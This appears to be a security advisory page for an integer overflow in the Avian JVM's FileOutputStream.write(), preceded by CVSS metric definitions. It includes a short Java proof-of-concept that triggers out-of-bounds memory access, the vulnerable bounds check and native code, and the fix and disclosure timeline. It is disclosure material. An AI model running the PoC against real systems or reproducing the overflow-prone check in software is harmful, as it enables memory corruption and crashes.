The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Exploit Maturity
Proof-of-Concept
E
Based on available threat intelligence each of the following must apply: Proof-of-concept exploit code is publicly available No knowledge of reported attempts to exploit this vulnerability No knowledge of publicly available solutions used to simplify attempts to exploit the vulnerability (i.e., the “Attacked” value does not apply)
Below is a copy: ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow
Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow
Author: Pietro Oliva
Vendor: ReadyTalk
Product: Avian JVM
Affected version: 1.2.0 before 27th October 2020
Fixed Version: 1.2.0 since 27th October 2020
Description:
The issue is located in the FileOutputStream.write() method defined in
FileOutputStream.java, where a boundary check is performed in order to prevent
out-of-bounds memory read/write. However, this check contained an integer
overflow which leads to the same check being bypassed and out-of-bounds
read/write.
Impact:
Attackers could exploit this vulnerability to read/write arbitrary content in
the JVM memory. This could in turn result in denial of service, memory
disclosure, or arbitrary code execution in the context of the JVM.
Exploitation:
The following PoC would trigger an OOB read/write and/or crash of Avian JVM:
import java.io.IOException;
import java.io.FileDescriptor;
import java.io.FileOutputStream;
public class poc {
public static void main(String[] args) throws IOException {
byte[] data = "somedata".getBytes();
FileDescriptor fd = new FileDescriptor().out;
FileOutputStream fos = new FileOutputStream(fd);
fos.write(data, 1, 0x7fffffff); // Integer overflow + OOB read/write here
}
}
Evidence:
public void write(byte[] b, int offset, int length) throws IOException {
if (b == null) {
throw new NullPointerException();
}
if (offset < 0 || offset + length > b.length) { // Integer overflow here
throw new ArrayIndexOutOfBoundsException();
}
write(fd, b, offset, length);
}
extern "C" JNIEXPORT void JNICALL
Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e,
jclass,
jint fd,
jbyteArray b,
jint offset,
jint length)
{
jbyte* data = static_cast<jbyte*>(malloc(length));
if (data == 0) {
throwNew(e, "java/lang/OutOfMemoryError", 0);
return;
}
e->GetByteArrayRegion(b, offset, length, data);
if (not e->ExceptionCheck()) {
doWrite(e, fd, data, length);
}
free(data);
}
void JNICALL GetByteArrayRegion(Thread* t,
jbyteArray array,
jint offset,
jint length,
jbyte* dst)
{
ENTER(t, Thread::ActiveState);
if (length) {
// Out-of-bounds read/write here
memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte));
}
}
As can be observed above, offset+length can overflow in FileOutputStream.write()
and later result in OOB read/write during memcpy() in GetByteArrayRegion().
Mitigating factors:
Since offset needs to be a positive integer, and length is limited to a valid
malloc argument, there is a limited range of memory where an attacker could read
or write as a result of this vulnerability.
Remediation:
A fix has been made available with the following commit:
https://github.com/ReadyTalk/avian/commit/0871979b298add320ca63f65060acb7532c8a0dd
Disclosure timeline:
20th October 2020 - Vulnerability reported.
20th October 2020 - Vulnerability acknowledged.
20th October 2020 - CVE request sent to Mitre.
23rd October 2020 - Sent reminder to Mitre.
27th October 2020 - Sent reminder to Mitre.
27th October 2020 - Patch proposed via pull request.
27th October 2020 - Patch merged into master branch.
29th October 2020 - Sent reminder to Mitre.
2nd November 2020 - CVE request sent again to Mitre.
11th November 2020 - Vulnerability details shared on fulldisclosure without CVE identifier.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum